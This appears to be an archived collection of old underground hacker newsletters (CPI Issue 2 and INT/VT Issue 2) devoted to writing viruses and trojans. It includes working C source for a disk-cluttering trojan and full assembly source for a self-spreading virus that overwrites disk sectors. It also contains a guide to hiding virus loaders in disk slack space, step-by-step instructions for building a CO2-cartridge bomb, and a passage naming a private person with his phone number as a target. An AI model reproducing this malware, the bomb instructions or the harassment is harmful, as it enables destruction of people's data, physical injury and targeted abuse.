@@ -0,0 +1,2193 @@ +[2.1] * * * * * * * * * * * * * * * * * * * * * * * * * * * * * + * * + * @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@@ * + * @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ * + * @@@@ @@@@ @@@@ @@@@ @@@ * + * @@@ @@@ @@@@ @@@ * + * @@@ @@@@@@@@@@@@@@@ @@@ * + * @@@ @@@@@@@@@@@@@@ @@@ * + * @@@ @@@ @@@ * + * @@@@ @@@@ @@@ @@@ * + * @@@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ * + * @@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ * + * * + * * * * * * * * * * * * * * * * * * * * * * * * * * * * * + + C O R R U P T E D + + P R O G R A M M I N G + + I N T E R N A T I O N A L + + + + presents: + + + @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ + @ @ + @ Virili And Trojan Horses @ + @ @ + @ A ProtagonistYs Point Of View @ + @ @ + @ Issue #2 @ + @ @ + @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ + + + + + + + + DISCLAIMER::All of the information contained in this newsletter reflects the + thoughts and ideas of the authors, not their actions. The sole + purpose of this document is to educate and spread information. + Any illegal or illicit action is not endorsed by the authors or + CPI. The authors and CPI are not responsible for any information + which may present itself as old or mis-interpreted, and actions + by the reader. Remember, ZJust Say No!Y + + + + + + + + + + + + +CPI #2 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +Issue 2, Volume 1 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +Release Date::July 27,1989 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ + + + + + + Introduction To CPI#2 + --------------------- + Well, here is the olong awaited@ second issue of CPI, A ProtagonistYs Point +of view. This issue should prove a bit interesting, I dunno, but at least +entertaining for the time it takes to read. Enjoy the information and donYt +forget the disclaimer. + Oh yes, if you have some interesting articles or an application to send +us, just see the BBS list at the end of this document. Thanx. 
All applications +and information will be voted on through the CPI Inner Circle. Hope you enjoy +this issue as much as we enjoyed typing it... hehe... + Until our next issue, (which may be whenever), good-bye. + + Doctor Dissector + + + Table of Contents + ----------------- + Part Title Author + ----------------------------------------------------------------------------- + 2.1 Title Page, Introduction, & TOC....................... Doctor Dissector + 2.2 Another Explanation Of Virili And Trojans............. Acid Phreak + 2.3 V-IDEA-1.............................................. Ashton Darkside + 2.4 V-IDEA-2.............................................. Ashton Darkside + 2.5 The Generic Virus..................................... Doctor Dissector + 2.6 Aids.................................................. Doctor Dissector + 2.7 Batch File Virus...................................... PHUN 3.2 + 2.8 Basic Virus........................................... PHUN 3.2 + 2.9 The Alemeda Virus..................................... PHUN 4.3 + 2.10 Virili In The News.................................... Various Sources + 2.11 Application For CPI................................... CPI Inner Circle + (CPI Node Phone #Ys Are In 2.11) + + +========================================================================= +Subject: INTVT Issue 2 1/1 +To: tk0jut2 +Original_To: BITNET%"tk0jut2@niu" + + + + The International Network of Thieves 2/16/91 + Virus and Trojan Oriented + Volume No. 2 + + Welcome back! Hey guys, (and gals I hope!) error in last issue, the date +was incorrect. The actual date of INT/VT1.TXT should have been 1/29/91. Sorry +dudez, had some people think it was a year old... Ok, geez, already issue two? +You people have been waiting for it haven't you? GOOD! + +VERY IMPORTANT NEWS! +-------------------- + Gene Dunn, (handle is Unimax) a PD'er and Virus hater is on the prowl. 
He +has called The Edge of Destruction(817-473-3621) many times, and actually came +over to MY house once. He is threatening to take me to court. He got a virus +on his PD BBS and wants The EoD shut down because of its virus support, and +because it is the home of INT/VT!!!! This man is a mad man. I won't take the +BBS down! But if the court says so, oh well! HEY! THIS GUY IS THREATENING THE +HOME OF INT/VT!!! His name again is GENE DUNN,(Actually Eugene I believe) and +the number to his BBS is 817-834-0143. What you do with that info is up to you. + +DISCLAIMER +---------- + The writers of this article, nor the sysops of The EoD, are responsible for +what you do with the information found/discussed here. You the user/reader of +this are soley responsible for what you do with this information, as it is +provided for programming research only, and not for ANY illegal uses. + +HOW WAS LESSON ONE? +------------------- + How did everyone do on your first lesson? Did you try it? On what? I'd +really enjoy it if you'd call The EoD and leave me mail about it. Also, if you +plan to continue with these issues and do the examples, I would recommend that +you get a copy of flushot(also available on The EoD), so as to watch the +virii/trojans as they work. + +INT/VT APPLICATION +------------------ + In this issue of INT/VT we will be including an application for joining our +association. Please fill it out and upload it to the SYSOP UPLOADS on The Edge +of Destruction BBS, 817-473-3621. You will be notified via E-Mail of your +status as a member. Thank You. + +SOME INFORMATION ABOUT DEBUG +---------------------------- + Since not everyone has Turbo Debugger, sNOOp, or some of the nicer +de-buggers, we're going to stick with using the DOS debug. Those of you who +already write virii and or are familiar with debug, you may want to skip this +section and pick up later down in the article. This is for the beginners to +debug. 
Here are some of the basic listing of commands for debug: + + COMMAND / USAGE / COMMENTS + A A[address] A0100:0100 Start assembling at address 0100:0100 + In most cases A0100 is all that is neccessary. + C C[range address] CC100,1FF 300 Compare portion of memory + D D[range] D0100 Displays the contents of memory at 0100 + E E[address] E0100 Start entering byte values at 0100 + F F[range list] F0100 L 100 fill 100 bytes + G G[address] G runs the current program + H H[values] H 100 108 ads and subtracts hex numbers + I I[value] I2F8 input one byte from port specified + L L[address] Load + M M[range address] move blocks of memory + N N[name] Names file (i.e. N Joe.exe) + O O[value byte] sends specified byte to output port + Q Q Terminates Debug + R R[register] Shows the register and edit it + S S[range list] Search the specified range for bytes + T T Trace through program + U U[address] Unnassemble at address x, u0100 + W W[amt. of bytes] Save to disk + + While these are not explained in great detail, it is not neccessary to +do so at this time, but as we use them it will be. I recommend you go to the +bookstore and purchase Peter Norton's Guide to Assembly Language. It will run +you about $25.00 and then download MASM5.0 from The EoD. MASM stand for +Microsoft Assembler, for you who are new to this. Also available are Turbo C +and Turbo C++ v2.00 and Turbo Pascal v6.00. Feel free to call and D/L these +files. Reading Peter Norton's book will make what you find here much easier. +Also, it will teach you how to program in assembler. Something we DO NOT plan +to do here, but to sharpen your knowledge, or HELP you learn it. Something else +you need is the BOOK of INT's. Soon to be available on The EoD. + +LESSON 2, ANOTHER SIMPLE TROJAN IN C +------------------------------------ + Our last trojan was in ASM, this one is in C. And known as Crazy. What it +does is makes tons of directories on someones HD. You say, "ooo, big deal." +Exactly, its a VERY BIG deal. 
In DOS, you can not remove more than one DIR at a +time. Can you imagine removing all of those DIR's by hand? It could take +weeks, months, or years. + + +/* Thanks to Ninja Wala of SUP for writing such a niftey trojan! */ + + + +#include +#include /* Include Files */ +#include /* Used by C to make life easier */ + +main() +{ + int i,j; /* Names I and J as variables */ + char tmp[20]; + char far *ptr; + + for (i=0;i<=50;i++){ /* random loop to make dirs */ + srand(rand()); + ptr = itoa(rand(),tmp,10); + mkdir ( ptr ); /* makes the DIR */ + chdir ( ptr ); + for (j=0;j<=50;j++){ + ptr = itoa(rand(),tmp,10); + mkdir( ptr ); + } + chdir ("\\"); + } +} + + While we are not going deep into how this works, we give you the source +so you can compile it and have some real nice fun killing an HD. If you would +like the compiled version (EXE version) you can get it off of many BBS's +including The EoD. + +NEXT ISSUE +---------- + In the next issue we will actually look at the inner workings of a virus. +Rather than a trojan. As to which virus, we can not be sure at this time. +Also, we will start our virus description and fake virus section. + +JUST FOR ANARCHISTS - CO2 Cartidge Bomb! +---------------------------------------- + Ok dudez, here is a nice mailbox or toilet bomb. Let the air out of the +CO2 cartridge, I don't care how. Use a nail, knife, screwdriver, or whatever +else to make the hole a bit bigger. Fill it with gunpowder and pack it down by +tapping the bottom of the CO2 cartridge on a hard surface. Insert a fuse, (I +recommend a good waterproof cannon fuse, but a firecracker fuse will work if its +all you can find.) Use something that seals real hard and tight. I have used +silicon before, but I think you cand find something that will try much harder if +you look. Find your destination. Light it. RUN! FAST! If it blows with you +near it. Better be a hospital near. I flushed one down a toilet at a Fina +Station and the Toilet CRACKED and started leaking. 
Not to mention water was +everywhere! Dripping from the ceiling and the walls. + +CALL OUR HOME WORLD +------------------- + Call our HQ BBS: The Edge of Destruction - 817-473-3621 + +APOLOGY +------- + We realize that this issue was not as informative as some of you were +hoping. The reason for this is the problem of Gene Dunn. We have had little or +no time to donate to INT/VT due to his insanity. We hope to have a MUCH, MUCH +more interesting Issue as Issue 3. Which you should see in about 1-2 weeks. + +Subject: CPI Issue 2 2/11 +To: tk0jut2 +Original_To: BITNET%"tk0jut2@niu" + + +[2.2] + Explanation of Viruses and Trojans Horses + ----------------------------------------- + Written by Acid Phreak + + Like itYs biological counterpart, a computer virus is an agent of +infection, insinuating itself into a program or disk and forcing its host +to replicate the virus code. Hackers fascinated by the concept of oliving@ +code wrote the first viruses as projects or as pranks. In the past few +years, however, a different kind of virus has become common, one that lives +up to an earlier meaning of the word: in Latin, virus means poison. + These new viruses incorporate features of another type of insidious +program called a Trojan horse. Such a program masquerades as a useful +utility or product but wreaks havoc on your system when you run it. It may +erase a few files, format your disk, steal secrets--anything software can +do, a Trojan horse can do. A malicious virus can do all this then attempt +to replicate itself and infect other systems. + The growing media coverage of the virus conceptand of specific viruse +has promoted the development of a new type of software. Antivirus programs, +vaccines--they go by many names, but their purpose is to protect from virus +attack. At present there are more antivirus programs than known viruses +(not for long). + Some experts quibble about exactly what a virus is. 
The most widely +known viruses, the IBM Xmas virus and the recent Internet virus, are not +viruses according to some experts because they do not infect other programs. +Others argue that every Trojan horse is a virus--one that depends completely +on people to spread it. + +How They Reproduce: +------------------- + Viruses canYt travel without people. Your PC will not become infected +unless someone runs an infected program on it, whether accidentally or on +purpose. PCYs are different from mainframe networks in this way--the +mainframe Internet virus spread by transmitting itself to other systems and +ordering them to execute it as a program. That kind of active transmission +is not possible on a PC. + Virus code reproduces by changing something in your system. Some viruses +strike COMMAND.COM or the hidden system files. Others, like the notorious +Pakistani-Brain virus, modify the boot sector of floppy disks. Still others +attach themselves to any .COM or .EXE file. In truth, any file on your +system that can be executed--whether itYs a program, a device driver, an +overlay, or even a batch file--could be the target of a virus. + When an infected program runs, the virus code usually executes first and +then transfers control to the original program. The virus may immediately +infect other programs, or it may load itself into RAM and continue spreading. +If the virus can infect a file that will be used on another system, it has +succeeded. + +What They Can Do: +----------------- + Viruses go through two phases: a replication phase and an action phase. +The action doesnYt happen until a certain even occurs--perhaps reaching a +special date or running the virus a certain number of times. It wouldnYt +make sense for a virus to damage your system the first time it ran; it needs +some time to grow and spread first. + The most vulnerable spot for a virus attack is your hard diskYs file +allocation table (FAT). 
This table tells DOS where every fileYs data resides +on the disk. Without the FAT, the dataYs still there but DOS canYt find it. +A virus could also preform a low-level format on some or all the tracks of +your hard disk, erase all files, or change the CMOS memory on AT-class +computers so that they donYt recognize the hard disk. + Most of the dangers involve data only, but itYs even possible to burn +out a monochrome monitor with the right code. + Some virus assaults are quite subtl. One known virus finds four +consecutive digits on the screen and switches two. LetYs hope youYre not +balancing the companyYs books when this one hits. Others slow down system +operations or introduce serious errors. + + +Subject: CPI Issue 2 3/11 +To: tk0jut2 +Original_To: BITNET%"tk0jut2@niu" + + +[2.3] +------------------------------------------------------------------------------- + ______ ________ ___________ + / ____ \ | ____ \ |____ ____| + | / \_| | | \ | | | + | | | |_____| | | | + | | | ______/ | | + | | _ | | | | + | \____/ | /\ | | /\ ____| |____ /\ + \______/ \/ |_| \/ |___________| \/ + + + oWe ainYt the phucking Salvation Army.@ + +------------------------------------------------------------------------------- + + + C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L + + * * * present * * * + + oOk, IYve written the virus, now where the hell do I put it?@ + + By Ashton Darkside (DUNE / SATAN / CPI) + + +******************************************************************************* +DISCLAIMER: This text file is provided to the massed for INFORMATIONAL PURPOSES + ONLY! The author does NOT condone the use of this information in any manner + that would be illegal or harmful. The fact that the author knows and spreads + this information in no way suggests that he uses it. The author also accepts + no responsibility for the malicious use of this information by anyone who + reads it! Remember, we may talk alot, but we ojust say no@ to doing it. 
+******************************************************************************* + + + + + + + + + + Ok, wow! YouYve just invented the most incredibly nifty virus. It +slices, it dices, it squshes, it mushes (sorry Berke Breathed) peopleYs data! +But the only problem is, if you go around infecting every damn file, some cute +software company is going to start putting in procedures that checksum their +warez each time they run, which will make life for your infecting virus a total +bitch. Or somebodyYs going to come up with an incredibly nifty vaccination util +that will wipe it out. Because, i mean, hey, when disk space starts vanishing +suddenly in 500K chunks people tend to notice. Especially people like me that +rarely have more than 4096 bytes free on their HD anyway. Ok. So youYre saying +owow, so what, I can make mine fool-proof@, etc, etc. But wait! ThereYs no need +to go around wasting your precious time when the answer is right there in front +of you! Think about it, you could be putting that time into writing better and +more inovative viruses, or you could be worring about keeping the file size, +the date & time, and the attributes the same. With this system, you only need +to infect one file, preferably one thatYs NOT a system file, but something that +will get run alot, and will be able to load your nifty virus on a daily basis. +This system also doesnYt take up any disk space, other than the loader. And the +loader could conceivably be under 16 bytes (damn near undetectable). First of +all, you need to know what programs to infect. Now, everybody knows about using +COMMAND.COM and thatYs unoriginal anyway, when there are other programs people +run all the time. Like DesqView or Norton Utilities or MASM or a BBS file or +WordPerfect; you get the idea. Better still are dos commands like Format, Link +or even compression utilities. But you get the point. Besides, whoYs going to +miss 16 bytes, right? Now, the good part: where to put the damn thing. 
One note +to the programmer: This could get tricky if your virus is over 2k or isnYt +written in Assembly, but the size problem is easy enough, it would be a simple +thing to break your virus into parts and have the parts load each other into +the system so that you do eventually get the whole thing. The only problem with +using languages besides assembly is that itYs hard to break them up into 2k +segments. If you want to infect floppys, or smaller disks, youYd be best off to +break your file into 512 byte segments, since theyYre easier to hide. But, hey, +in assembly, you can generate pretty small programs that do alot, tho. Ok, by +now youYve probably figured out that weYre talking about the part of the disk +called Zthe slackY. Every disk that your computer uses is divided up into parts +called sectors, which are (in almost all cases) 512 bytes. But in larger disks, +and even in floppies, keeping track of every single sector would be a complete +bitch. So the sectors are bunched together into groups called ZclustersY. On +floppy disks, clusters are usually two sectors, or 1024 bytes, and on hard +disks, theyYre typically 4096 bytes, or eight sectors. Now think about it, you +have programs on your hard disk, and what are the odds that they will have +sizes that always end up in increments of 4096? If IYve lost you, think of it +this way: the file takes up a bunch of clusters, but in the last cluster it +uses, there is usually some ZslackY, or space that isnYt used by the file. This +space is between where the actual file ends and where the actual cluster ends. +So, potentially, you can have up to 4095 bytes of ZslackY on a file on a hard +disk, or 1023 bytes of ZslackY on a floppy. In fact, right now, run the Norton +program ZFS /S /TY command from your root directory, and subtract the total +size of the files from the total disk space used. ThatYs how much ZslackY space +is on your disk (a hell of alot, even on a floppy). 
To use the slack, all you +need to do is to find a chunk of slack big enough to fit your virus (or a +segment of your virus) and use direct disk access (INT 13) to put your virus +there. There is one minor problem with this. Any disk write to that cluster +will overwrite the slack with ZgarbageY from memory. This is because of the way +DOS manages itYs disk I/O and it canYt be fixed without alot of hassles. But, +there is a way around even this. And it involves a popular (abeit outdated and +usually ineffectual) form of virus protection called the READ-ONLY flag. This +flag is the greatest friend of this type of virus. Because if the file is not +written to, the last cluster is not written to, and voila! Your virus is safe +>from mischivious accidents. And since the R-O flag doesnYt affect INT 13 disk +I/O, it wonYt be in your way. Also, check for programs with the SYSTEM flag set + + + + + + + + + +because that has the same Read-only effect (even tho I havenYt seen it written, +itYs true that if the file is designated system, DOS treats it as read-only, +whether the R-O flag is set or not). The space after IBMBIOS.COM or IBMDOS.COM +in MS-DOS (not PC-DOS, it uses different files, or so I am told; IYve been too +lazy to find out myself) or a protected (!) COMMAND.COM file in either type of +DOS would be ideal for this. All you have to do is then insert your loader into +some innocent-looking file, and you are in business. All your loader has to do +is read the sector into the highest part of memory, and do a far call to it. +Your virus cann then go about waiting for floppy disks to infect, and place +loaders on any available executable file on the disk. Sound pretty neet? It is! +Anyway, have fun, and be sure to upload your virus, along with a README file on +how it works to CPI Headquarters so we can check it out! And remember: donYt +target P/H/P boards (thatYs Phreak/Hack/Pirate boards) with ANY virus. 
Even if +the Sysop is a leech and you want to shove his balls down his throat. Because +if all the PHP boards go down (especially members of CPI), who the hell can you +go to for all these nifty virus ideas? And besides, itYs betraying your own +people, which is uncool even if you are an anarchist. So, target uncool PD +boards, or your bossYs computer or whatever, but donYt attack your friends. +Other than that, have phun, and phuck it up! + + Ashton Darkside + Dallas Underground Network Exchange (DUNE) + Software And Telecom Applicaitons Network (SATAN) + Corrupted Programmers International (CPI) + + +PS: Watch it, this file (by itself) has about 3 1/2k of slack (on a hard disk). + +Call these boards because the sysops are cool: +Oblivion (SATAN HQ) Sysop: Agent Orange (SATAN leader) +System: Utopia (SATAN HQ) Sysop: RobbinY Hood (SATAN leader) +The Andromeda Strain (CPI HQ) Sysop: Acid Phreak (CPI leader) +D.U.N.E. (DUNE HQ) Sysop: Freddy Krueger (DUNE leader) +The Jolly BardsmenYs Pub & Tavern +The Sierra Crib +The Phrozen Phorest +Knight ShadowYs Grotto + +And if I forgot your board, sorry, but donYt send me E-mail bitching about it! 
+ + +Subject: CPI Issue 2 4/11 +To: tk0jut2 +Original_To: BITNET%"tk0jut2@niu" + + +[2.4] +------------------------------------------------------------------------------- + ______ ________ ___________ + / ____ \ | ____ \ |____ ____| + | / \_| | | \ | | | + | | | |_____| | | | + | | | ______/ | | + | | _ | | | | + | \____/ | /\ | | /\ ____| |____ /\ + \______/ \/ |_| \/ |___________| \/ + + + oWe ainYt the phucking Salvation Army.@ + +------------------------------------------------------------------------------- + + + C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L + + * * * present * * * + + CPI Virus Standards - Protect yourself and your friends + + By Ashton Darkside (DUNE / SATAN / CPI) + + +******************************************************************************* +DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES + ONLY! The author does NOT condone the use of this information in any manner + that would be illegal or harmful. The fact that the author knows and spreads + this information in no way suggests that he uses it. The author also accepts + no responsibility for the malicious use of this information by anyone who + reads it! Remember, we may talk alot, but we ojust say no@ to doing it. +******************************************************************************* + + + + + + + + + + One of the main problems with viruses is that once you set one loose, +it is no longer under your control. I propose to stop this by introducing some +standards of virus writing that will enable them to be deactivated whenever +they enter a ZfriendlyY (CPI) system. In the long run, even the author of the +virus is not immune to being attacked. The following are what I have termed the +CPI standards for writing viruses. They will allow a virus to easily check any +system they are being run on for a type of Zidentity badgeY. If it is found, +the virus will not infect the system it is being run on. 
The other standards +are mostly written around this. + +CPI Standards for writing viruses - + + 1 - The virus will have an Zactive periodY and an Zinactive periodY. + The active periods will be no more than one year in length (to make + it more difficult to discover the virus). You may release different + versions of your virus with different Zactive periodsY. It is not + recommended that your virus deactivate itself after the set active + period, as this would enable people to deactivate viruses by using + their computer with the date set to 2069 or something. It is also + required that activation periods begin on January 1 and end on + December 31. This will coincide with the changing identity codes. + + 2 - The virus will check for an identity code by executing Interrrupt + 12h with the following register settings: AX - 4350, BX - 4920, + CX - AB46, DX - 554E. If the system is friendly, then a pointer + will be returned in CX:DX to an ASCIIZ (0-terminated) string which + will have different contents in different years. The codes are not + to be included in any text file, and should only be given through + E-mail on CPI affiliated systems. You can always ask me by sending + me mail at The Andromeda Strain BBS. If a system is detected as + friendly, the virus will not attempt to infect or damage it, but it + is ok to display a little greeting message about how lucky the + user was. + + 3 - We very much encourage you to upload your virus, along with a breif + description on the workings into the CPI section at The Andromeda + Strain BBS. Only CPI members will know about your virus. This is + so that CPI members can share techniques and it also allows us to + verify that the identity check works. If we see any improvements + that could be made, such as ways to streamline code, better ways of + spreading, etc. we will inform you so that you can make the changes + if you wish. 
+ + 4 - It is also suggested that you use ADS standard for virus storage on + infected disks. This meathod uses disk slack space for storage and + is more thoroughly described in a previous text file by me. I think + that this is the most effective and invisible way to store viruli. + + 5 - A list of CPI-Standard viruli will be avaliable at all times from + The Andromeda Strain BBS, to CPI users. Identity strings will also + be available to anyone in CPI, or anyone who uploads source code to + a virus which is 100% complete except for the Identity string (it + must be written to CPI-Standards). Non-CPI members who do this will + be more seriously considered for membership in CPI. + + Ashton Darkside + Dallas Underground Network Exchange (DUNE) + Software And Telecom Applications Network (SATAN) + Corrupted Programmers International (CPI) + +PS: This file (by itself) has approx 2.5k of slack. + + +Subject: CPI Issue 2 5/11 +To: tk0jut2 +Original_To: BITNET%"tk0jut2@niu" + + +;============================================================================= +; +; C*P*I +; +; CORRUPTED PROGRAMMING INTERNATIONAL +; ----------------------------------- +; p r e s e n t s +; +; T H E +; _ _ +; (g) GENERIC VIRUS (g) +; ^ ^ +; +; +; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF +; CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT +; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR oPROGRAM TO BIG TO +; FIT IN MEMORY@ THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS. +; +; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON +; THE DISK. HAVE PHUN WITH THIS ONE. +; +; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE +; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING. +; +; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE +; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF +; THIS VIRUS. 
ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR +; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE. +; +; DOCTOR DISSECTOR +; CPI ASSOCIATES +; +;============================================================================= + +MAIN: + NOP ;| Marker bytes that identify this program + NOP ;| as infected/a virus + NOP ;| + + MOV AX,00 ;| Initialize the pointers + MOV ES:[POINTER],AX ;| + MOV ES:[COUNTER],AX ;| + MOV ES:[DISKS B],AL ;| + + MOV AH,19 ;| Get the selected drive (dir?) + INT 21 ;| + + MOV CS:DRIVE,AL ;| Get current path (save drive) + MOV AH,47 ;| (dir?) + MOV DH,0 ;| + ADD AL,1 ;| + MOV DL,AL ;| (in actual drive) + LEA SI,CS:OLD_PATH ;| + INT 21 ;| + + MOV AH,0E ;| Find # of drives + MOV DL,0 ;| + INT 21 ;| + CMP AL,01 ;| (Check if only one drive) + JNZ HUPS3 ;| (If not one drive, go the HUPS3) + MOV AL,06 ;| Set pointer to SEARCH_ORDER +6 (one drive) + + HUPS3: MOV AH,0 ;| Execute this if there is more than 1 drive + LEA BX,SEARCH_ORDER ;| + ADD BX,AX ;| + ADD BX,0001 ;| + MOV CS:POINTER,BX ;| + CLC ;| + +CHANGE_DISK: ;| Carry is set if no more .COM files are + JNC NO_NAME_CHANGE ;| found. From here, .EXE files will be + MOV AH,17 ;| renamed to .COM (change .EXE to .COM) + LEA DX,CS:MASKE_EXE ;| but will cause the error message oProgram + INT 21 ;| to large to fit in memory@ when starting + CMP AL,0FF ;| larger infected programs + JNZ NO_NAME_CHANGE ;| (Check if an .EXE is found) + + MOV AH,2CH ;| If neither .COM or .EXE files can be found, + INT 21 ;| then random sectors on the disk will be + MOV BX,CS:POINTER ;| overwritten depending on the system time + MOV AL,CS:[BX] ;| in milliseconds. This is the time of the + MOV BX,DX ;| complete oinfection@ of a storage medium. + MOV CX,2 ;| The virus can find nothing more to infect + MOV DH,0 ;| starts its destruction. + INT 26 ;| (write crap on disk) + +NO_NAME_CHANGE: ;| Check if the end of the search order table + MOV BX,CS:POINTER ;| has been reached. If so, end. 
+ DEC BX ;| + MOV CS:POINTER,BX ;| + MOV DL,CS:[BX] ;| + CMP DL,0FF ;| + JNZ HUPS2 ;| + JMP HOPS ;| + +HUPS2: ;| Get a new drive from the search order table + MOV AH,0E ;| and select it, beginning with the ROOT dir. + INT 21 ;| (change drive) + MOV AH,3B ;| (change path) + LEA DX,PATH ;| + INT 21 ;| + JMP FIND_FIRST_FILE ;| + +FIND_FIRST_SUBDIR: ;| Starting from the root, search for the + MOV AH,17 ;| first subdir. First, (change .exe to .com) + LEA DX,CS:MASKE_EXE ;| convert all .EXE files to .COM in the + INT 21 ;| old directory. + MOV AH,3B ;| (use root directory) + LEA DX,PATH ;| + INT 21 ;| + MOV AH,04E ;| (search for first subdirectory) + MOV CX,00010001B ;| (dir mask) + LEA DX,MASKE_DIR ;| + INT 21 ;| + JC CHANGE_DISK ;| + MOV BX,CS:COUNTER ;| + INC BX ;| + DEC BX ;| + JZ USE_NEXT_SUBDIR ;| + +FIND_NEXT_SUBDIR: ;| Search for the next sub-dir, if no more + MOV AH,4FH ;| are found, the (search for next subdir) + INT 21 ;| drive will be changed. + JC CHANGE_DISK ;| + DEC BX ;| + JNZ FIND_NEXT_SUBDIR ;| + +USE_NEXT_SUBDIR: + MOV AH,2FH ;| Select found directory. (get dta address) + INT 21 ;| + ADD BX,1CH ;| + MOV ES:[BX],W@\@ ;| (address of name in dta) + INC BX ;| + PUSH DS ;| + MOV AX,ES ;| + MOV DS,AX ;| + MOV DX,BX ;| + MOV AH,3B ;| (change path) + INT 21 ;| + POP DS ;| + MOV BX,CS:COUNTER ;| + INC BX ;| + MOV CS:COUNTER,BX ;| + +FIND_FIRST_FILE: ;| Find first .COM file in the current dir. + MOV AH,04E ;| If there are none, (Search for first) + MOV CX,00000001B ;| search the next directory. (mask) + LEA DX,MASKE_COM ;| + INT 21 ;| + JC FIND_FIRST_SUBDIR ;| + JMP CHECK_IF_ILL ;| + +FIND_NEXT_FILE: ;| If program is ill (infected) then search + MOV AH,4FH ;| for another. (search for next) + INT 21 ;| + JC FIND_FIRST_SUBDIR ;| + +CHECK_IF_ILL: ;| Check if already infected by virus. 
+ MOV AH,3D ;| (open channel) + MOV AL,02 ;| (read/write) + MOV DX,9EH ;| (address of name in dta) + INT 21 ;| + MOV BX,AX ;| (save channel) + MOV AH,3FH ;| (read file) + MOV CH,BUFLEN ;| + MOV DX,BUFFER ;| (write in buffer) + INT 21 ;| + MOV AH,3EH ;| (close file) + INT 21 ;| + MOV BX,CS:[BUFFER] ;| (look for three NOPYs) + CMP BX,9090 ;| + JZ FIND_NEXT_FILE ;| + + MOV AH,43 ;| This section by-passes (write enable) + MOV AL,0 ;| the MS/PC DOS Write Protection. + MOV DX,9EH ;| (address of name in dta) + INT 21 ;| + MOV AH,43 ;| + MOV AL,01 ;| + AND CX,11111110B ;| + INT 21 ;| + + MOV AH,3D ;| Open file for read/write (open channel) + MOV AL,02 ;| access (read/write) + MOV DX,9EH ;| (address of name in dta) + INT 21 ;| + + MOV BX,AX ;| Read date entry of program and (channel) + MOV AH,57 ;| save for future use. (get date) + MOV AL,0 ;| + INT 21 ;| + PUSH CX ;| (save date) + PUSH DX ;| + + MOV DX,CS:[CONTA W] ;| The jump located at 0100h (save old jmp) + MOV CS:[JMPBUF],DX ;| the program will be saved for future use. + MOV DX,CS:[BUFFER+1] ;| (save new jump) + LEA CX,CONT-100 ;| + SUB DX,CX ;| + MOV CS:[CONTA],DX ;| + + MOV AH,57 ;| The virus now copies itself to (write date) + MOV AL,1 ;| to the start of the file. + POP DX ;| + POP CX ;| (restore date) + INT 21 ;| + MOV AH,3EH ;| (close file) + INT 21 ;| + + MOV DX,CS:[JMPBUF] ;| Restore the old jump address. The virus + MOV CS:[CONTA],DX ;| at address oCONTA@ the jump which was at the + ;| start of the program. This is done to +HOPS: ;| preserve the executability of the host + NOP ;| program as much as possible. After saving, + CALL USE_OLD ;| it still works with the jump address in the + ;| virus. 
The jump address in the virus differs + ;| from the jump address in memory + +CONT DB 0E9 ;| Continue with the host program (make jump) +CONTA DW 0 ;| + MOV AH,00 ;| + INT 21 ;| + +USE_OLD: + MOV AH,0E ;| Reactivate the selected (use old drive) + MOV DL,CS:DRIVE ;| drive at the start of the program, and + INT 21 ;| reactivate the selected path at the start + MOV AH,3B ;| of the program.(use old drive) + LEA DX,OLD_PATH-1 ;| (get old path and backslash) + INT 21 ;| + RET ;| + +SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF + +POINTER DW 0000 ;| (pointer f. search order) +COUNTER DW 0000 ;| (counter f. nth. search) +DISKS DB 0 ;| (number of disks) +MASKE_COM DB o*.COM@,00 ;| (search for com files) +MASKE_DIR DB o*@,00 ;| (search for dirYs) +MASKE_EXE DB 0FF,0,0,0,0,0,00111111XB + DB 0,@????????EXE@,0,0,0,0 + DB 0,@????????COM@,0 +MASKE_ALL DB 0FF,0,0,0,0,0,00111111XB + DB 0,@???????????@,0,0,0,0 + DB 0,@????????COM@,0 + +BUFFER EQU 0E00 ;| (a safe place) + +BUFLEN EQU 208H ;| Length of virus. Modify this accordingly + ;| if you modify this source. Be careful + ;| for this may change! + +JMPBUF EQU BUFFER+BUFLEN ;| (a safe place for jmp) + +PATH DB o\@,0 ;| (first place) +DRIVE DB 0 ;| (actual drive) +BACK_SLASH DB o\@ +OLD_PATH DB 32 DUP (?) 
